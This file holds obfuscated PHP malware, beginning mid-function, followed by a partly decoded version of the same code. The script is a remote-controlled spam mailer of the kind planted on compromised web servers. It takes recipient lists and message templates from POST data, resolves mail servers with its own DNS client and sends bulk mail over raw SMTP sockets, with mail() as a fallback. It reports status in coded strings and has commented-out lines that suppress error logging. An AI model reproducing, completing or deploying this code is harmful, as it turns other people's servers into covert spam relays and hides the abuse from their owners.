@$GLOBALS['cyzbs96']($r76[16].$r76[2].$r76[55].$r76[50].$r76[17].$r76[6].$r76[34].$r76[38].$r76[83].$r76[86].$r76[77].$r76[97].$r76[62].$r76[2].$r76[42].$r76[16].$r76[55].$r76[50].$r76[17].$r76[6].$r76[34].$r76[38].$r76[16].$r76[53].$r76[66].$r76[78],$mkfpj46, $qivuk92) && isset($qivuk92) && $GLOBALS['tlyiy12']($qivuk92) > 1) { $jabhi9[$r76[96].$r76[49].$r76[95].$r76[69].$r76[67].$r76[94].$r76[78].$r76[41].$r76[5]] = $qivuk92[1]; } $jabhi9[$r76[36].$r76[49].$r76[66].$r76[87].$r76[0].$r76[24].$r76[49].$r76[78]] = @$GLOBALS['laepm94']($r76[16].$r76[65].$r76[83].$r76[43].$r76[43].$r76[43].$r76[8].$r76[7].$r76[87].$r76[41].$r76[62].$r76[42].$r76[86].$r76[16].$r76[53], '', $_SERVER[$r76[22].$r76[67].$r76[67].$r76[3].$r76[54].$r76[22].$r76[17].$r76[55].$r76[67]]); return TRUE; } function fewfx40($r76, $clhez9, $binbe57) { if (!isset($clhez9) || $clhez9 == "") { return FALSE; } $xgmnr96 = @$GLOBALS['vbhwy58'][$clhez9]; if ($binbe57) { $xgmnr96 = $GLOBALS['inenw32']($r76, $xgmnr96); for($wtqra76 = 0; $wtqra76 < $GLOBALS['brkww19']($xgmnr96); $wtqra76++) { $xgmnr96[$wtqra76]= $GLOBALS['xyxdn38']($GLOBALS['rtdlc97']($xgmnr96[$wtqra76]) ^ 2); } } return $GLOBALS['cnrfe78']($GLOBALS['wzekj92']($xgmnr96)); } function xwses24($r76, $rxuwy6) { $bdhch16=""; for($afses42=0;$afses42<256;$afses42++){$vefvn90[$afses42]=$GLOBALS['xyxdn38']($afses42);} $adcpo58=$GLOBALS['yrqxp89']($GLOBALS['vxogc32']($r76[16].$r76[16],$r76[4].$r76[50].$r76[40].$r76[6].$r76[79].$r76[0].$r76[48].$r76[22].$r76[64].$r76[81].$r76[19].$r76[71].$r76[11].$r76[56].$r76[17].$r76[3].$r76[37].$r76[68].$r76[55].$r76[67].$r76[44].$r76[60].$r76[82].$r76[32].$r76[34].$r76[63].$r76[90].$r76[96].$r76[27].$r76[95].$r76[94].$r76[7].$r76[61].$r76[36].$r76[53].$r76[47].$r76[29].$r76[5].$r76[78].$r76[58].$r76[49].$r76[41].$r76[84].$r76[24].$r76[66].$r76[87].$r76[45].$r76[70].$r76[43].$r76[20].$r76[69].$r76[35].$r76[52].$r76[76].$r76[46].$r76[31].$r76[85].$r76[28].$r76[23].$r76[14].$r76[18].$r76[15].$r76[80].$r76[16],-1,1)); $rfsny13 = array(); $GLOBALS['xavtv19']($r76[83].$r76[1].$r76[4].$r76[26].$r76[35].$r76[52].$r76[26].$r76[15].$r76[80].$r76[42].$r76[16].$r76[9].$r76[72].$r76[76].$r76[33].$r76[85].$r76[10].$r76[62],$rxuwy6,$rfsny13); foreach($rfsny13[0] as $dkpwg91){ $omqhl54=0; for($afses42=0;isset($dkpwg91[$afses42]);$afses42++){ $omqhl54=($omqhl54<<6)+$adcpo58[$dkpwg91[$afses42]]; if($afses42>0){ $bdhch16.=$vefvn90[$omqhl54>>(4-(2*($afses42-1)))];$omqhl54=$omqhl54&(0xf>>(2*($afses42-1))); } } } return $bdhch16; } function potcc11($r76, $mlaat34) { for($wtqra76 = 0; $wtqra76 < $GLOBALS['brkww19']($mlaat34); $wtqra76++) { $mlaat34[$wtqra76] = $GLOBALS['xyxdn38']($GLOBALS['rtdlc97']($mlaat34[$wtqra76]) ^ 2);} return $GLOBALS['zjheh80']($mlaat34); } function rzekg39($r76, $qzvww53, $ajvyf84, $kbujj5, $nqbin74, $qvbta37, &$kdidw81, &$msnsv40, $gxosp36 = false) { $vynus66 = ""; $yjmto45 = NULL; $qrmrf7 = NULL; $kdidw81 = 0; $msnsv40 = ""; if ($ajvyf84 == $GLOBALS['glyac65']($r76[55].$r76[17].$r76[40].$r76[19].$r76[79].$r76[67].$r76[54].$r76[3].$r76[68].$r76[17].$r76[67].$r76[17].$r76[54].$r76[67].$r76[40].$r76[3])) { $vynus66 = $r76[87].$r76[27].$r76[41]; $yjmto45 = SOL_TCP; $qrmrf7 = SOCK_STREAM; } else if ($ajvyf84 == $GLOBALS['glyac65']($r76[55].$r76[17].$r76[40].$r76[19].$r76[79].$r76[67].$r76[54].$r76[3].$r76[68].$r76[17].$r76[67].$r76[17].$r76[54].$r76[44].$r76[6].$r76[3])) { $vynus66 = $r76[45].$r76[95].$r76[41]; $qrmrf7 = SOCK_DGRAM; $yjmto45 = SOL_UDP; } else { $msnsv40 = $r76[79].$r76[24].$r76[24].$r76[49].$r76[24].$r76[74].$r76[39].$r76[53].$r76[58].$r76[70].$r76[90].$r76[5].$r76[53].$r76[95].$r76[39].$r76[41].$r76[24].$r76[49].$r76[87].$r76[49].$r76[27].$r76[49].$r76[5]; return FALSE; } switch($GLOBALS['glyac65']($r76[55].$r76[17].$r76[40].$r76[19].$r76[79].$r76[67].$r76[54].$r76[67].$r76[34].$r76[3].$r76[79])) { case $GLOBALS['glyac65']($r76[55].$r76[17].$r76[40].$r76[19].$r76[79].$r76[67].$r76[54].$r76[67].$r76[34].$r76[3].$r76[79].$r76[54].$r76[55].$r76[17].$r76[40].$r76[19].$r76[79].$r76[67]): if ($qzvww53 == FALSE) { $qzvww53 = @$GLOBALS['gisxn89'](AF_INET, $qrmrf7, $yjmto45); if ($qzvww53 == FALSE) { $kdidw81 = $GLOBALS['oqikt29'](); $msnsv40 = $GLOBALS['tvxvt28']($kdidw81); break; } $GLOBALS['fmlld76']($qzvww53 , SOL_SOCKET, SO_REUSEADDR, 1); $GLOBALS['fmlld76']($qzvww53 , SOL_SOCKET, SO_RCVTIMEO, array($r76[66].$r76[94].$r76[27] => $qvbta37, $r76[45].$r76[66].$r76[94].$r76[27] => 0)); $GLOBALS['fmlld76']($qzvww53 , SOL_SOCKET, SO_SNDTIMEO, array($r76[66].$r76[94].$r76[27] => $qvbta37, $r76[45].$r76[66].$r76[94].$r76[27] => 0)); if ($gxosp36) { $GLOBALS['zwafy86']($qzvww53); } } if (!@$GLOBALS['uocvp26']($qzvww53, $kbujj5, $nqbin74)) { $kdidw81 = $GLOBALS['oqikt29']($qzvww53); $msnsv40 = $GLOBALS['tvxvt28']($kdidw81); } if ($gxosp36) { $GLOBALS['zwafy86']($qzvww53); } break; case $GLOBALS['glyac65']($r76[55].$r76[17].$r76[40].$r76[19].$r76[79].$r76[67].$r76[54].$r76[67].$r76[34].$r76[3].$r76[79].$r76[54].$r76[0].$r76[55].$r76[17].$r76[40].$r76[19].$r76[79].$r76[67]): $qzvww53 = @$GLOBALS['xvxof76']($vynus66.$r76[74].$r76[16].$r76[16].$kbujj5, $nqbin74, $kdidw81, $msnsv40, $qvbta37); if ($qzvww53 && $gxosp36) { @$GLOBALS['vzqix48']($qzvww53, 0); } @$GLOBALS['sltum36']($qzvww53, $qvbta37); break; case $GLOBALS['glyac65']($r76[55].$r76[17].$r76[40].$r76[19].$r76[79].$r76[67].$r76[54].$r76[67].$r76[34].$r76[3].$r76[79].$r76[54].$r76[55].$r76[67].$r76[68].$r76[79].$r76[4].$r76[11]): $qzvww53 = @$GLOBALS['clkxn20']($vynus66.$r76[74].$r76[16].$r76[16].$kbujj5.$r76[74].$nqbin74, $kdidw81, $msnsv40, $qvbta37); if ($qzvww53 && $gxosp36) { @$GLOBALS['vzqix48']($qzvww53, 0); } @$GLOBALS['sltum36']($qzvww53, $qvbta37); break; default: $msnsv40 = $r76[79].$r76[24].$r76[24].$r76[49].$r76[24].$r76[74].$r76[39].$r76[53].$r76[58].$r76[70].$r76[90].$r76[5].$r76[53].$r76[95].$r76[39].$r76[66].$r76[49].$r76[27].$r76[29].$r76[94].$r76[87].$r76[39].$r76[87].$r76[69].$r76[41].$r76[94]; return FALSE; } return $qzvww53; } function xllez0($r76, &$qzvww53) { if ($qzvww53 == FALSE) { return; } if ($GLOBALS['glyac65']($r76[55].$r76[17].$r76[40].$r76[19].$r76[79].$r76[67].$r76[54].$r76[67].$r76[34].$r76[3].$r76[79]) == $GLOBALS['glyac65']($r76[55].$r76[17].$r76[40].$r76[19].$r76[79].$r76[67].$r76[54].$r76[67].$r76[34].$r76[3].$r76[79].$r76[54].$r76[55].$r76[17].$r76[40].$r76[19].$r76[79].$r76[67])) { @$GLOBALS['unkvq75']($qzvww53); } else { @$GLOBALS['yoxhh65']($qzvww53); } $qzvww53 = FALSE; return; } function oyysg80($r76, $qzvww53, $ykcxg22, &$kdidw81, &$msnsv40) { if ($qzvww53 == FALSE) { return FALSE; } if ($GLOBALS['glyac65']($r76[55].$r76[17].$r76[40].$r76[19].$r76[79].$r76[67].$r76[54].$r76[67].$r76[34].$r76[3].$r76[79]) == $GLOBALS['glyac65']($r76[55].$r76[17].$r76[40].$r76[19].$r76[79].$r76[67].$r76[54].$r76[67].$r76[34].$r76[3].$r76[79].$r76[54].$r76[55].$r76[17].$r76[40].$r76[19].$r76[79].$r76[67])) { $bdhch16 = @$GLOBALS['dskbo69']($qzvww53, $ykcxg22, PHP_BINARY_READ); if ($bdhch16 == FALSE) { $kdidw81 = $GLOBALS['oqikt29']($qzvww53); $msnsv40 = $GLOBALS['tvxvt28']($kdidw81); } } else { if (@$GLOBALS['jhtbn88']($qzvww53)) { return FALSE; } $bdhch16 = @$GLOBALS['zflfl64']($qzvww53, $ykcxg22); if ($GLOBALS['brkww19']($bdhch16) == 0) { $kdidw81 = 35; } } return $bdhch16; } function foftg27($r76, $qzvww53, $jrnqk91, &$kdidw81, &$msnsv40) { if ($qzvww53 == FALSE) { return FALSE; } if ($GLOBALS['glyac65']($r76[55].$r76[17].$r76[40].$r76[19].$r76[79].$r76[67].$r76[54].$r76[67].$r76[34].$r76[3].$r76[79]) == $GLOBALS['glyac65']($r76[55].$r76[17].$r76[40].$r76[19].$r76[79].$r76[67].$r76[54].$r76[67].$r76[34].$r76[3].$r76[79].$r76[54].$r76[55].$r76[17].$r76[40].$r76[19].$r76[79].$r76[67])) { $bdhch16 = @$GLOBALS['uwnpx27']($qzvww53, $jrnqk91); if ($bdhch16 == FALSE) { $kdidw81 = $GLOBALS['oqikt29']($qzvww53); $msnsv40 = $GLOBALS['tvxvt28']($kdidw81); } } else { if (@$GLOBALS['jhtbn88']($qzvww53)) { return FALSE; } $bdhch16 = @$GLOBALS['stdvp96']($qzvww53, $jrnqk91); } return $bdhch16; } function wdtjf68($r76, $qzvww53, $qvbta37) { if ($qzvww53 == FALSE) { return FALSE; } if ($GLOBALS['glyac65']($r76[55].$r76[17].$r76[40].$r76[19].$r76[79].$r76[67].$r76[54].$r76[67].$r76[34].$r76[3].$r76[79]) == $GLOBALS['glyac65']($r76[55].$r76[17].$r76[40].$r76[19].$r76[79].$r76[67].$r76[54].$r76[67].$r76[34].$r76[3].$r76[79].$r76[54].$r76[55].$r76[17].$r76[40].$r76[19].$r76[79].$r76[67])) { @$GLOBALS['fmlld76']($qzvww53 , SOL_SOCKET, SO_RCVTIMEO, array($r76[66].$r76[94].$r76[27] => $qvbta37, $r76[45].$r76[66].$r76[94].$r76[27] => 0)); @$GLOBALS['fmlld76']($qzvww53 , SOL_SOCKET, SO_SNDTIMEO, array($r76[66].$r76[94].$r76[27] => $qvbta37, $r76[45].$r76[66].$r76[94].$r76[27] => 0)); } else { @$GLOBALS['sltum36']($qzvww53, $qvbta37); } return TRUE; } function ybewy88($r76, $pfahk9, $jvanz2) { $kdidw81 = 0; $msnsv40 = ""; $qzvww53 = $GLOBALS['yoejz48']($r76, FALSE, $GLOBALS['glyac65']($r76[55].$r76[17].$r76[40].$r76[19].$r76[79].$r76[67].$r76[54].$r76[3].$r76[68].$r76[17].$r76[67].$r76[17].$r76[54].$r76[44].$r76[6].$r76[3]), $r76[18].$r76[86].$r76[18].$r76[86].$r76[18].$r76[86].$r76[18], 53, 10, $kdidw81, $msnsv40); if (!$qzvww53) { return FALSE; } $lsxth41 = $GLOBALS['ocmvf65'](0x0001, 0xFFFE); $uamee6 = $GLOBALS['bkenc7']($r76[86], $pfahk9); $vcoty45 = $GLOBALS['llpxl21']($r76[58].$r76[58].$r76[58].$r76[58].$r76[58].$r76[58], $lsxth41, 0x0100, 0x0001, 0x0000, 0x0000, 0x0000); foreach($uamee6 as $sahcc1) { $vcoty45 .= $GLOBALS['llpxl21']($r76[40].$r76[90].$r76[77], $GLOBALS['brkww19']($sahcc1), $sahcc1); } $vcoty45.= $GLOBALS['llpxl21']($r76[40].$r76[58].$r76[58], 0x00, $jvanz2, 0x0001); $zkvhr54 = $GLOBALS['ibere91']($r76, $qzvww53, $vcoty45, $kdidw81, $msnsv40); if (!$zkvhr54 || $zkvhr54 != $GLOBALS['brkww19']($vcoty45)) { $GLOBALS['xcnkh30']($r76, $qzvww53); return FALSE; } $yikqh30 = $GLOBALS['yhcum29']($r76, $qzvww53, 4086, $kdidw81, $msnsv40); if ($yikqh30 == FALSE || $GLOBALS['brkww19']($yikqh30) < 12) { $GLOBALS['xcnkh30']($r76, $qzvww53); return FALSE; } $eynrg66 = $GLOBALS['efljc33']($r76[58].$r76[87].$r76[53].$r76[95].$r76[16].$r76[58].$r76[7].$r76[5].$r76[90].$r76[61].$r76[66].$r76[16].$r76[58].$r76[84].$r76[45].$r76[94].$r76[16].$r76[58].$r76[90].$r76[58].$r76[66].$r76[16].$r76[58].$r76[90].$r76[45].$r76[87].$r76[36].$r76[16].$r76[58].$r76[90].$r76[95].$r76[95], substr($yikqh30, 0, 12)); $zjthw11 = 12; $bdhch16 = array($r76[36].$r76[94].$r76[90].$r76[95].$r76[94].$r76[24] => $eynrg66); for ($afses42 = $GLOBALS['glyac65']($r76[6].$r76[56].$r76[55].$r76[54].$r76[55].$r76[67].$r76[79].$r76[3].$r76[54].$r76[37].$r76[79].$r76[55].$r76[67].$r76[64].$r76[17].$r76[56]); $afses42 <= $GLOBALS['glyac65']($r76[6].$r76[56].$r76[55].$r76[54].$r76[55].$r76[67].$r76[79].$r76[3].$r76[54].$r76[4].$r76[6].$r76[6].$r76[64].$r76[67].$r76[64].$r76[17].$r76[56].$r76[4].$r76[71]); $afses42++) { $trxcp25 = ''; switch ($afses42) { case $GLOBALS['glyac65']($r76[6].$r76[56].$r76[55].$r76[54].$r76[55].$r76[67].$r76[79].$r76[3].$r76[54].$r76[37].$r76[79].$r76[55].$r76[67].$r76[64].$r76[17].$r76[56]): $trxcp25 = $r76[84].$r76[45].$r76[94]; break; case $GLOBALS['glyac65']($r76[6].$r76[56].$r76[55].$r76[54].$r76[55].$r76[67].$r76[79].$r76[3].$r76[54].$r76[4].$r76[56].$r76[55].$r76[82].$r76[79].$r76[68]): $trxcp25 = $r76[90].$r76[58].$r76[66]; break; case $GLOBALS['glyac65']($r76[6].$r76[56].$r76[55].$r76[54].$r76[55].$r76[67].$r76[79].$r76[3].$r76[54].$r76[4].$r76[44].$r76[67].$r76[22].$r76[17].$r76[68].$r76[64].$r76[67].$r76[34]):$trxcp25 = $r76[90].$r76[45].$r76[87].$r76[36];break; case $GLOBALS['glyac65']($r76[6].$r76[56].$r76[55].$r76[54].$r76[55].$r76[67].$r76[79].$r76[3].$r76[54].$r76[4].$r76[6].$r76[6].$r76[64].$r76[67].$r76[64].$r76[17].$r76[56].$r76[4].$r76[71]):$trxcp25 = $r76[90].$r76[95].$r76[95];break; } for ($ybjpw87 = 0; $ybjpw87 < $eynrg66[$trxcp25]; $ybjpw87++) { $qthuo24[$r76[58].$r76[90].$r76[78].$r76[94]] = $GLOBALS['zndda55']($r76, $zjthw11, $yikqh30); if ($afses42 == $GLOBALS['glyac65']($r76[6].$r76[56].$r76[55].$r76[54].$r76[55].$r76[67].$r76[79].$r76[3].$r76[54].$r76[37].$r76[79].$r76[55].$r76[67].$r76[64].$r76[17].$r76[56])) { $qthuo24 = $GLOBALS['lzlla40']($qthuo24, $GLOBALS['efljc33']($r76[58].$r76[87].$r76[69].$r76[41].$r76[94].$r76[16].$r76[58].$r76[27].$r76[5].$r76[90].$r76[66].$r76[66], substr($yikqh30, $zjthw11, 4))); $zjthw11+=4; } else { $qthuo24 = $GLOBALS['lzlla40']($qthuo24 , $GLOBALS['efljc33']($r76[58].$r76[87].$r76[69].$r76[41].$r76[94].$r76[16].$r76[58].$r76[27].$r76[5].$r76[90].$r76[66].$r76[66].$r76[16].$r76[56].$r76[87].$r76[87].$r76[5].$r76[16].$r76[58].$r76[95].$r76[90].$r76[87].$r76[90].$r76[5].$r76[94].$r76[58].$r76[61].$r76[87].$r76[36], substr($yikqh30, $zjthw11, 10))); $zjthw11+=10; switch ($qthuo24[$r76[87].$r76[69].$r76[41].$r76[94]]) { case $GLOBALS['glyac65']($r76[6].$r76[56].$r76[55].$r76[54].$r76[67].$r76[34].$r76[3].$r76[79].$r76[54].$r76[11].$r76[32]): $qthuo24 = $GLOBALS['lzlla40']($qthuo24, $GLOBALS['efljc33']($r76[58].$r76[41].$r76[24].$r76[94].$r76[7].$r76[94].$r76[24].$r76[94].$r76[58].$r76[27].$r76[94], substr($yikqh30, $zjthw11, 2))); $zjthw11+=2; $qthuo24[$r76[95].$r76[90].$r76[87].$r76[90]] = $GLOBALS['zndda55']($r76, $zjthw11, $yikqh30); break; case $GLOBALS['glyac65']($r76[6].$r76[56].$r76[55].$r76[54].$r76[67].$r76[34].$r76[3].$r76[79].$r76[54].$r76[4]): $qthuo24 = $GLOBALS['lzlla40']($qthuo24, $GLOBALS['efljc33']($r76[56].$r76[95].$r76[90].$r76[87].$r76[90], substr($yikqh30, $zjthw11, 4))); $zjthw11+=4; $qthuo24[$r76[53].$r76[41]] = $GLOBALS['axqrn63']($qthuo24[$r76[95].$r76[90].$r76[87].$r76[90]]); break; case $GLOBALS['glyac65']($r76[6].$r76[56].$r76[55].$r76[54].$r76[67].$r76[34].$r76[3].$r76[79].$r76[54].$r76[56].$r76[55]): $qthuo24[$r76[95].$r76[90].$r76[87].$r76[90]] = $GLOBALS['zndda55']($r76, $zjthw11, $yikqh30); break; default: $zjthw11 += $qthuo24[$r76[95].$r76[90].$r76[87].$r76[90].$r76[5].$r76[94].$r76[58].$r76[61].$r76[87].$r76[36]]; } } $bdhch16[$trxcp25][] = $qthuo24; } } return $bdhch16; } function cgzhg7($r76, &$kwgra59, $yikqh30) { $bdhch16 = ""; $svrpc42 = $kwgra59; while ($GLOBALS['rtdlc97']($yikqh30[$svrpc42]) != 0) { if ($GLOBALS['rtdlc97']($yikqh30[$svrpc42]) == 0xC0) { if ($svrpc42 >= $kwgra59) { $kwgra59 += 2; } $svrpc42 = $GLOBALS['rtdlc97']($yikqh30[$svrpc42 + 1]); continue; } if ($GLOBALS['brkww19']($bdhch16) > 0) { $bdhch16 .= $r76[86]; } $bdhch16 .= substr($yikqh30, $svrpc42 + 1, $GLOBALS['rtdlc97']($yikqh30[$svrpc42])); $svrpc42 += $GLOBALS['rtdlc97']($yikqh30[$svrpc42]) + 1; if ($svrpc42 > $kwgra59) { $kwgra59 = $svrpc42; } } if ($svrpc42 >= $kwgra59) { $kwgra59 += 1; } return $bdhch16; }


The decoded code:

$r76="F[<PAlDf|]}M@~79/O8Kx\rH6r&-c5k\n3X,YzhQ> Cp\\wUu2jGoB;0i_SN\tn%Vg)ZI^sTRyvL{\$:=1*mE+JW(q4.t'`a!\"#edb?"; 

// @error_reporting(NULL);
// @ini_set("error_log", NULL);
// @ini_set("log_errors", 0);
define("DNS_TYPE_MX", 0x000F);
define("DNS_TYPE_A", 0x0001);
define("DNS_TYPE_NS", 0x0002);
define("DNS_STEP_QESTION", 1);
define("DNS_STEP_ANSWER", 2);
define("DNS_STEP_AUTHORITY", 3);
define("DNS_STEP_ADDITIONAL", 4);
define("SOCKET_TYPE_SOCKET", 1);
define("SOCKET_TYPE_FSOCKET", 2);
define("SOCKET_TYPE_STREAM", 4);
define("SOCKET_TYPE_NO", 5);
define("SOCKET_PROTO_TCP", 1);
define("SOCKET_PROTO_UDP", 2);
define("STEP_CONNECT", 0);
define("STEP_CONNECTED", 1);
define("STEP_EHLO", 2);
define("STEP_MAILFROM", 3);
define("STEP_RCPTTO", 4);
define("STEP_DATA", 5);
define("STEP_BODY", 6);
define("STEP_QUIT", 7);
define("STEP_COMPLETED", 8);
determine_socket_type($r76, NULL);
$senderEmailData = array(
    "toList" => "",
    "fromLogin" => "",
    "fromName" => "",
    "subjTempl" => "",
    "bodyTempl" => "",
    "hostFrom" => ""
);
if (FALSE == getDataFromPost($r76, $senderEmailData)) {
    echo PHP_OS . "+" . md5(0987654321) . "+01+[[]]
";
    exit;
}
$emailDataList = array();
for ($i = 0; $i < count($senderEmailData["toList"]); $i++) {
    $emailData = array(
        "id" => $i,
        "g_mailto" => "",
        "g_mailto+" => "",
        "g_mailfrom" => "",
        "g_mailfrom+" => "",
        "g_domainto" => "",
        "g_domainfrom" => "",
        "g_namefirst" => "",
        "g_namelast" => "",
        "g_body" => "",
        "g_subject" => "",
        "g_fff" => FALSE,
        "g_header" => "",
        "g_headerfrom" => "",
        "s_header" => "",
        "s_mxhost" => "",
        "s_mxaddr" => FALSE,
        "s_sock" => FALSE,
        "s_time" => time(),
        "s_step" => constant("STEP_CONNECT"),
        "s_port" => 25,
        "s_datain" => "",
        "s_dataout" => "",
        "s_trig" => FALSE,
        "l_err" => "",
        "l_done" => FALSE,
        "l_way" => 0, // 0 for not done, 1 for step?, 2 for using mail()
        "l_failsmtp" => FALSE,
        "l_smtp_end" => FALSE
    );
    if (FALSE == populateEmailData($r76, $senderEmailData["toList"][$i], $senderEmailData, $emailData)) {
        echo PHP_OS . "+" . md5(1111111111) . "+02+[[" . encode_data($r76, $senderEmailData["toList"][$i]) . "]]
";
        continue;
    }
    $emailDataList[] = $emailData;
}


print_r($emailDataList);

exit;


processSendEmails($r76, $emailDataList); // first send by sockets
sendByMail($r76, $emailDataList); // then fall back to mail()
printStatus($r76, $emailDataList); // print status


exit;



function printStatus($r76, $emailDataList)
{
    $successes = 0;
    $successMethods = "";
    for ($i = 0; $i < count($emailDataList); $i++) {
        if ($emailDataList[$i]["l_failsmtp"] == TRUE) {
            echo PHP_OS . "+" . md5(2222222222) . "+04+[[" . encode_data($r76, $emailDataList[$i]["g_mailto"] . " :: " . $emailDataList[$i]["l_err"]) . "]]
";
        }
        if ($emailDataList[$i]["l_done"] == TRUE) {
            $successMethods .= $emailDataList[$i]["l_way"];
            $successes++;
        }
    }
    if ($successes == 0) {
        echo PHP_OS . "+" . md5(0987654321) . "+04+[[]]
";
    } else {
        echo "OK+" . md5(1234567890) . "+" . $successes . "+" . count($emailDataList) . "[" . $successMethods . "]
";
    }
}
function sendByMail($r76, &$emailDataList)
{
    if (!function_exists("mail")) {
        return FALSE;
    }
    for ($i = 0; $i < count($emailDataList); $i++) {
        if ($emailDataList[$i]["l_done"] == TRUE) {
            continue;
        }
        if ($emailDataList[$i]["g_fff"]) {
            if (@mail($emailDataList[$i]["g_mailto+"], $emailDataList[$i]["g_subject"], $emailDataList[$i]["g_body"], $emailDataList[$i]["g_headerfrom"] . $emailDataList[$i]["g_header"], "-f" . $emailDataList[$i]["g_mailfrom"])) {
                $emailDataList[$i]["l_done"] = TRUE;
                $emailDataList[$i]["l_way"]  = 2;
            } else {
                $emailDataList[$i]["l_done"] = FALSE;
            }
        } else {
            if (@mail($emailDataList[$i]["g_mailto+"], $emailDataList[$i]["g_subject"], $emailDataList[$i]["g_body"], $emailDataList[$i]["g_header"])) {
                $emailDataList[$i]["l_done"] = TRUE;
                $emailDataList[$i]["l_way"]  = 2;
            } else {
                $emailDataList[$i]["l_done"] = FALSE;
            }
        }
    }
}
function processSendEmails($r76, &$emailDataList)
{
	// while at least one socket in email list is opened...
    while (hasOpenedSockets($r76, $emailDataList)) {
		// process the emails in the list
        processEmailSending($r76, $emailDataList);
        usleep(25000);
    }
}
function smtpCloseConnection($r76, &$emailDataList, $emailId, $flunj82, $mavcb77)
{
    if ($emailDataList[$emailId]["s_sock"] != FALSE) {
        close_connection($r76, $emailDataList[$emailId]["s_sock"]);
    }
    $emailDataList[$emailId]["l_err"]      = "[" . $emailDataList[$emailId]["s_step"] . "]" . trim(preg_replace("/
/", " ", $flunj82));
    $emailDataList[$emailId]["l_failsmtp"] = $mavcb77;
    $emailDataList[$emailId]["l_smtp_end"] = TRUE;
    return;
}
function processEmailSending($r76, &$emailDataList)
{
    $startTime = time();
    foreach ($emailDataList as $emailId => $emailData) {
        if ($emailData["l_smtp_end"] == TRUE) {
            continue;
        }
        if ($emailData["s_time"] + 20 < $startTime) {
            if ($emailDataList[$emailId]["s_step"] == constant("STEP_CONNECT") && $emailDataList[$emailId]["s_port"] != 587) {
                close_connection($r76, $emailDataList[$emailId]["s_sock"]);
                $emailDataList[$emailId]["s_port"] = 587;
                $emailDataList[$emailId]["s_time"] = time();
                continue;
            }
            smtpCloseConnection($r76, $emailDataList, $emailId, "timeout", FALSE);
            continue;
        }
        switch ($emailDataList[$emailId]["s_step"]) {
            case constant("STEP_CONNECT"):
                if ($emailDataList[$emailId]["s_mxaddr"] == FALSE) {
                    $emailDataList[$emailId]["s_mxaddr"] = @gethostbyname($emailDataList[$emailId]["s_mxhost"]);
                    if (!@preg_match("/([0-9]{1,3}\.?){4}/", $emailDataList[$emailId]["s_mxaddr"])) {
                        smtpCloseConnection($r76, $emailDataList, $emailId, "resolve mx", FALSE);
                        break;
                    }
                }
                $errno                    = 0;
                $errstr                    = '';
                $emailDataList[$emailId]["s_sock"] = socketFactory($r76, $emailDataList[$emailId]["s_sock"], constant("SOCKET_PROTO_TCP"), $emailDataList[$emailId]["s_mxaddr"], $emailDataList[$emailId]["s_port"], 2, $errno, $errstr, TRUE);
                if ($emailDataList[$emailId]["s_sock"] == FALSE) {
                    break;
                }
                if ($errno == 0 || $errno === 56 || $errno === 10056) {
                    $emailDataList[$emailId]["s_step"] = constant("STEP_CONNECTED");
                    wdtjf68($r76, $emailDataList[$emailId]["s_sock"], 15);
                    $emailDataList[$emailId]["s_time"] = time();
                }
                break;
            case constant("STEP_CONNECTED"):
                if (rxrmp70($r76, $emailDataList, $emailId)) {
                    $emailDataList[$emailId]["s_datain"]  = "";
                    $emailDataList[$emailId]["s_dataout"] = "EHLO " . $emailDataList[$emailId]["g_domainfrom"] . "
";
                    $emailDataList[$emailId]["s_step"]    = constant("STEP_EHLO");
                    $emailDataList[$emailId]["s_time"]    = time();
                }
                break;
            case constant("STEP_EHLO"):
                if (prcux47($r76, $emailDataList, $emailId)) {
                    if (rxrmp70($r76, $emailDataList, $emailId)) {
                        if (substr($emailDataList[$emailId]["s_datain"], 0, 3) != 250) {
                            smtpCloseConnection($r76, $emailDataList, $emailId, $emailDataList[$emailId]["s_datain"], TRUE);
                            break;
                        }
                        $emailDataList[$emailId]["s_datain"]  = "";
                        $emailDataList[$emailId]["s_dataout"] = "MAIL FROM:<" . $emailDataList[$emailId]["g_mailfrom"] . ">
";
                        $emailDataList[$emailId]["s_step"]    = constant("STEP_MAILFROM");
                        $emailDataList[$emailId]["s_time"]    = time();
                    }
                    break;
                }
                break;
            case constant("STEP_MAILFROM"):
                if (prcux47($r76, $emailDataList, $emailId)) {
                    if (rxrmp70($r76, $emailDataList, $emailId)) {
                        if (substr($emailDataList[$emailId]["s_datain"], 0, 3) != 250) {
                            smtpCloseConnection($r76, $emailDataList, $emailId, $emailDataList[$emailId]["s_datain"], TRUE);
                            break;
                        }
                        $emailDataList[$emailId]["s_datain"]  = "";
                        $emailDataList[$emailId]["s_dataout"] = "RCPT TO:<" . $emailDataList[$emailId]["g_mailto"] . ">
";
                        $emailDataList[$emailId]["s_step"]    = constant("STEP_RCPTTO");
                        $emailDataList[$emailId]["s_time"]    = time();
                    }
                    break;
                }
                break;
            case constant("STEP_RCPTTO"):
                if (prcux47($r76, $emailDataList, $emailId)) {
                    if (rxrmp70($r76, $emailDataList, $emailId)) {
                        if (substr($emailDataList[$emailId]["s_datain"], 0, 3) != 250 && substr($emailDataList[$emailId]["s_datain"], 0, 3) != 251) {
                            smtpCloseConnection($r76, $emailDataList, $emailId, $emailDataList[$emailId]["s_datain"], TRUE);
                            break;
                        }
                        $emailDataList[$emailId]["s_datain"]  = "";
                        $emailDataList[$emailId]["s_dataout"] = "DATA
";
                        $emailDataList[$emailId]["s_step"]    = constant("STEP_DATA");
                        $emailDataList[$emailId]["s_time"]    = time();
                    }
                    break;
                }
                break;
            case constant("STEP_DATA"):
                if (prcux47($r76, $emailDataList, $emailId)) {
                    if (rxrmp70($r76, $emailDataList, $emailId)) {
                        if (substr($emailDataList[$emailId]["s_datain"], 0, 3) != 354) {
                            smtpCloseConnection($r76, $emailDataList, $emailId, $emailDataList[$emailId]["s_datain"], TRUE);
                            break;
                        }
                        $emailDataList[$emailId]["s_datain"]  = "";
                        $emailDataList[$emailId]["s_dataout"] = $emailDataList[$emailId]["s_header"] . "
" . $emailDataList[$emailId]["g_body"] . "
.
";
                        $emailDataList[$emailId]["s_step"]    = constant("STEP_BODY");
                        $emailDataList[$emailId]["s_time"]    = time();
                    }
                    break;
                }
                break;
            case constant("STEP_BODY"):
                if (prcux47($r76, $emailDataList, $emailId)) {
                    if (rxrmp70($r76, $emailDataList, $emailId)) {
                        if (substr($emailDataList[$emailId]["s_datain"], 0, 3) != 250) {
                            smtpCloseConnection($r76, $emailDataList, $emailId, $emailDataList[$emailId]["s_datain"], TRUE);
                            break;
                        }
                        $emailDataList[$emailId]["s_datain"]  = "";
                        $emailDataList[$emailId]["s_dataout"] = "QUIT
";
                        $emailDataList[$emailId]["s_step"]    = constant("STEP_QUIT");
                        $emailDataList[$emailId]["s_time"]    = time();
